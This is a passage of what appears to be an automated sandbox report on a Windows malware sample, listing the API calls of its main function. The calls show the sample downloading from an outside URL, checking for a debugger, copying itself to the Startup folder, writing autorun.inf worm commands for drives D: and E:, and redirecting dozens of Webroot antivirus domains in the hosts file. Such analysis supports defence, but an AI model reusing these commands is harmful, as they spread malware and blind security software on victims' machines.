5972->5750 5973->5972 5974 2088e3 _invalid_parameter_noinfo_noreturn 5973->5974 5975 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5973->5975 5975->5973 5979->5807

                                                      Executed Functions

                                                      Function 002029B0 Relevance: 616.7, APIs: 180, Strings: 170, Instructions: 4177sleepprocessCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00208530: ?good@ios_base@std@@QBE_NXZ.MSVCP140(3BC7ADCC,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085D0
                                                        • Part of subcall function 00208530: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085EB
                                                        • Part of subcall function 00208530: ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085F8
                                                        • Part of subcall function 00208530: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208708
                                                        • Part of subcall function 00208530: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020870E
                                                        • Part of subcall function 00208530: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020871D
                                                        • Part of subcall function 00208530: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020864E
                                                        • Part of subcall function 00202180: InternetOpenW.WININET(MyApp,00000001,00000000,00000000,00000000), ref: 00202195
                                                        • Part of subcall function 00202180: InternetOpenUrlW.WININET(00000000,https://stopify.co/news.php?tid=JBB69H.jpg ,00000000,00000000,80000000,00000000), ref: 002021B2
                                                        • Part of subcall function 00202180: InternetCloseHandle.WININET(00000000), ref: 002021BD
                                                        • Part of subcall function 00202180: InternetCloseHandle.WININET(00000000), ref: 002021C4
                                                      • IsDebuggerPresent.KERNEL32(3BC7ADCC), ref: 00202A02
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00202A16
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750), ref: 00202A74
                                                      • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 00202A91
                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(USERNAME), ref: 00202AA3
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750), ref: 00202AC7
                                                        • Part of subcall function 00209400: memcpy.VCRUNTIME140(00000000,C:\Users\,?,?,00000000,00000001), ref: 002094CB
                                                        • Part of subcall function 00209400: memcpy.VCRUNTIME140(?,?,?,00000000,C:\Users\,?,?,00000000,00000001), ref: 002094D9
                                                        • Part of subcall function 00208960: memcpy.VCRUNTIME140(00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B71
                                                        • Part of subcall function 00208960: memcpy.VCRUNTIME140(?,?,?,00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B7F
                                                      • memcpy.VCRUNTIME140(00000009,00000000,?,00000000), ref: 00202B51
                                                      • memcpy.VCRUNTIME140(00000000,C:\Users\,00000009,00000009,00000000,?,00000000), ref: 00202B62
                                                      • memcpy.VCRUNTIME140(?,0020D31E,00000009,00000000,C:\Users\,00000009,00000009,00000000,?,00000000), ref: 00202B80
                                                      • memcpy.VCRUNTIME140(?,\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,0000003E,00000009,00000000,00000009,00000000), ref: 00202C2F
                                                        • Part of subcall function 00208530: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,000000FF,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208677
                                                        • Part of subcall function 00208530: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002086C1
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000018,00000026,00207B80,MsMpEng.exe,aips.exe), ref: 00202D28
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00000000,00000009,00000000), ref: 00202D8E
                                                      • GetEnvironmentVariableA.KERNEL32(USERNAME,?,00000104), ref: 00202DA5
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,0020D35C,?,?), ref: 00202E5F
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,copy /v /y "%s" D:\bin.exe,?,?,?), ref: 00202E91
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo [autorun] > D:\autorun.inf,?,?), ref: 00202E98
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo open=bin.exe >> D:\autorun.inf,?,?), ref: 00202E9F
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,copy /v /y "%s" E:\bin.exe,?,?,?), ref: 00202EC0
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo [autorun] > E:\autorun.inf,?,?), ref: 00202EC7
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo open=bin.exe >> E:\autorun.inf,?,?), ref: 00202ECE
                                                      • Sleep.KERNELBASE(00000001), ref: 00202EF2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mail.webroot.com), ref: 00202F49
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 carbonite.webroot.com), ref: 00202FA0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 e.webroot.com), ref: 00202FF7
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 entupdates-cdn.webroot.com), ref: 0020304E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp-carbonite.webroot.com), ref: 002030A5
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp.webroot.com), ref: 002030FC
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 technet.webroot.com), ref: 00203172
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 technet.webroot.com), ref: 00203184
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 cms.webroot.com), ref: 00203244
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 cms.webroot.com), ref: 00203256
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 partner.webroot.com), ref: 00203316
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 partner.webroot.com), ref: 00203328
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp-carbonite-sandbox.webroot.com), ref: 002033E8
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp-carbonite-sandbox.webroot.com), ref: 002033FA
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-co.webroot.com), ref: 002034BA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-co.webroot.com), ref: 002034CC
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-ca.webroot.com), ref: 0020358C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-ca.webroot.com), ref: 0020359E
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vdi.webroot.com), ref: 0020365E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vdi.webroot.com), ref: 00203670
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 es.webroot.com), ref: 00203730
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 es.webroot.com), ref: 00203742
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 usmail.webroot.com), ref: 00203802
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 usmail.webroot.com), ref: 00203814
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sftp.webroot.com), ref: 002038D4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sftp.webroot.com), ref: 002038E6
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lyncdiscover.webroot.com), ref: 002039A6
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lyncdiscover.webroot.com), ref: 002039B8
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 fr.webroot.com), ref: 00203A78
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 fr.webroot.com), ref: 00203A8A
                                                        • Part of subcall function 00207E40: memcpy.VCRUNTIME140(?,?,?), ref: 00207E97
                                                        • Part of subcall function 00202240: memset.VCRUNTIME140(?,00000000,000000B8,3BC7ADCC), ref: 00202291
                                                        • Part of subcall function 00202240: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 002022B0
                                                        • Part of subcall function 00202240: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 002022D5
                                                        • Part of subcall function 00202240: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 0020230F
                                                        • Part of subcall function 00202240: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00202333
                                                        • Part of subcall function 00202240: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 0020238D
                                                        • Part of subcall function 00202240: ??7ios_base@std@@QBE_NXZ.MSVCP140(?,00000021,00000000), ref: 002023D0
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 it.webroot.com), ref: 00203B4A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 it.webroot.com), ref: 00203B5C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mail.webroot.com), ref: 00203C1C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mail.webroot.com), ref: 00203C2E
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 dnsptest.webroot.com), ref: 00203CEE
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 dnsptest.webroot.com), ref: 00203D00
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bounce2.webroot.com), ref: 00203DC0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bounce2.webroot.com), ref: 00203DD2
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev1.webroot.com), ref: 00203E92
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev1.webroot.com), ref: 00203EA4
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 nl.webroot.com), ref: 00203F64
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 nl.webroot.com), ref: 00203F76
                                                        • Part of subcall function 00207E40: memcpy.VCRUNTIME140(00000000,?,?), ref: 00207F26
                                                        • Part of subcall function 00207E40: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207EFF
                                                        • Part of subcall function 00207E40: Concurrency::cancel_current_task.LIBCPMT ref: 00207F45
                                                        • Part of subcall function 00202240: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00000000), ref: 00202408
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mobiletest.webroot.com), ref: 00204036
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mobiletest.webroot.com), ref: 00204048
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-nl.webroot.com), ref: 00204108
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-nl.webroot.com), ref: 0020411A
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-es.webroot.com), ref: 002041DA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-es.webroot.com), ref: 002041EC
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sip.webroot.com), ref: 002042AC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sip.webroot.com), ref: 002042BE
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 contentr.webroot.com), ref: 0020437E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 contentr.webroot.com), ref: 00204390
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 childsafe.webroot.com), ref: 00204450
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 childsafe.webroot.com), ref: 00204462
                                                        • Part of subcall function 00202240: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024AF
                                                        • Part of subcall function 00202240: memset.VCRUNTIME140(?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 0020256D
                                                        • Part of subcall function 00202240: ??7ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 00202597
                                                        • Part of subcall function 00202240: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750,?,00000021,00000000), ref: 00202625
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 spyware.webroot.com), ref: 00204522
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 spyware.webroot.com), ref: 00204534
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 testvpn.webroot.com), ref: 002045F4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 testvpn.webroot.com), ref: 00204606
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-de.webroot.com), ref: 002046C6
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-de.webroot.com), ref: 002046D8
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-au.webroot.com), ref: 00204798
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-au.webroot.com), ref: 002047AA
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-fr.webroot.com), ref: 0020486A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-fr.webroot.com), ref: 0020487C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-it.webroot.com), ref: 0020493C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-it.webroot.com), ref: 0020494E
                                                        • Part of subcall function 00202240: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 0020248C
                                                        • Part of subcall function 00202240: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024F2
                                                        • Part of subcall function 00202240: ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,?,00000021,00000000), ref: 00202534
                                                        • Part of subcall function 00202240: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,?,00000000,?,00000021,00000000), ref: 002025E1
                                                        • Part of subcall function 00202240: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 00202608
                                                        • Part of subcall function 00202240: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000021,00000000), ref: 0020265C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 extranet.webroot.com), ref: 00204A0E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 extranet.webroot.com), ref: 00204A20
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sso-tst.webroot.com), ref: 00204AE0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sso-tst.webroot.com), ref: 00204AF2
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 uk.webroot.com), ref: 00204BB2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 uk.webroot.com), ref: 00204BC4
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bb.webroot.com), ref: 00204C84
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bb.webroot.com), ref: 00204C96
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ncmec.webroot.com), ref: 00204D56
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ncmec.webroot.com), ref: 00204D68
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 stage.webroot.com), ref: 00204E28
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 stage.webroot.com), ref: 00204E3A
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest2.webroot.com), ref: 00204EFA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest2.webroot.com), ref: 00204F0C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 00204FCC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 00204FDE
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 0020509E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 002050B0
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 de.webroot.com), ref: 00205170
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 de.webroot.com), ref: 00205182
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 computer-security.webroot.com), ref: 00205242
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 computer-security.webroot.com), ref: 00205254
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 reseller.webroot.com), ref: 00205314
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 reseller.webroot.com), ref: 00205326
                                                        • Part of subcall function 00207DF0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00202E52,00000000,0020D35C,?,?), ref: 00207E35
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 connectuk.webroot.com), ref: 0020537D
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vpn.webroot.com), ref: 002053D4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound5.webroot.com), ref: 0020542B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound2.webroot.com), ref: 00205482
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound3.webroot.com), ref: 002054D9
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest5.webroot.com), ref: 00205530
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 view.webroot.com), ref: 00205587
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev.webroot.com), ref: 002055DE
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mydata.webroot.com), ref: 00205635
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest4.webroot.com), ref: 0020568C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sfdcstage.webroot.com), ref: 002056E3
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioning.webroot.com), ref: 0020573A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 channeledge.webroot.com), ref: 00205791
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 www2.webroot.com), ref: 002057E8
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest3.webroot.com), ref: 0020583F
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mx.webroot.com), ref: 00205896
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-enterprise.webroot.com), ref: 002058ED
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 autodiscover.webroot.com), ref: 00205944
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ws.webroot.com), ref: 0020599B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 owauk.webroot.com), ref: 002059F2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound1.webroot.com), ref: 00205A49
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 research.webroot.com), ref: 00205AA0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 access-tst.webroot.com), ref: 00205AF7
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vpnuk.webroot.com), ref: 00205B4E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ws-stg.webroot.com), ref: 00205BA5
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound4.webroot.com), ref: 00205BFC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev2.webroot.com), ref: 00205C53
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 myproduct.webroot.com), ref: 00205CAA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 labs.webroot.com), ref: 00205D01
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 tunnelfe.webroot.com), ref: 00205D58
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mailbox.webroot.com), ref: 00205DAF
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound.webroot.com), ref: 00205E06
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 access.webroot.com), ref: 00205E5D
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sfdctest6.webroot.com), ref: 00205EB4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 encrypt.webroot.com), ref: 00205F0B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound6.webroot.com), ref: 00205F62
